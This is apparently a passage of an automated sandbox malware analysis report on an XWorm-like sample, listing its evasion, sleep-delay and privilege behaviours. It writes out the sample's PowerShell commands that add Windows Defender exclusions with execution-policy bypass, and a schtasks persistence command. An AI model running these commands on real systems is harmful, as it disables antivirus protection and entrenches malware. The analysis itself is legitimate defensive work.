                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeMemory allocated: D80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeMemory allocated: 1AC60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeMemory allocated: 21B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeMemory allocated: 1A3A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeMemory allocated: DE0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeMemory allocated: 1A890000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeMemory allocated: 1150000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeMemory allocated: 1B1D0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWindow / User API: threadDelayed 8404Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeWindow / User API: threadDelayed 1444Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5700Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4111Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2587Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7023Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6817Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2775Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8138
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1456
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe TID: 3300Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 404Thread sleep count: 2587 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 404Thread sleep count: 7023 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep count: 6817 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep count: 2775 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2564Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700Thread sleep count: 8138 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1420Thread sleep count: 1456 > 30
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe TID: 2828Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe TID: 2800Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe TID: 3584Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeThread delayed: delay time: 922337203685477
                  Source: fjijTlM2tu.exe, 00000000.00000002.2932578473.000000001BA87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe'
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe'Jump to behavior
                  Bypasses PowerShell execution policy
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fjijTlM2tu.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'localsys64.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe"Jump to behavior
                  Source: fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002CC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                  Source: fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002CC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002CC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
